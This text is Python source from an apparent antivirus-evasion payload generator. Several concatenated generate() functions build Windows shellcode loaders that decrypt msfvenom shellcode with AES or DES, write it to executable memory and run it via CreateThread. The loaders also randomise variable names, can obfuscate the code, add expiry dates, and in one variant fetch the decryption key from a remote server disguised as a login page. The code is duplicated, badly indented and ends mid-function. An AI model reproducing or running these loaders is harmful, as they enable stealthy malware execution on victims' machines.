Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# Create Payload code
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
PayloadCode = 'from ctypes import *\n'
PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--'+ RandHttpstring +'-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
(EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--'+ RandHttpstring +'-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--'+ RandHttpstring +'-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
PayloadCode += ' pass\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
RandPtr
+ " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
+ ShellcodeVariableName
+ ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
)
PayloadCode += (
RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
"\t"
+ ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
"\t"
+ RandPtr
+ " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
+ ShellcodeVariableName
+ ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += (
"\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
PayloadCode += (
ShellcodeVariableName
+ " = bytearray("
+ RandDESPayload
+ ".decrypt("
+ RandEncShellCodePayload
+ ").decode('string_escape'))\n"
)
PayloadCode += (
HeapVar
+ " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
+ ShellcodeVariableName
+ ") * 2),avlol.c_int(0))\n"
)
PayloadCode += (
RandPtr
+ " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
+ HeapVar
+ "),avlol.c_int(0x00000008),avlol.c_int(len( "
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandBuf
+ " = (avlol.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"avlol.windll.kernel32.RtlMoveMemory(avlol.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",avlol.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
+ RandPtr
+ "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
)
PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
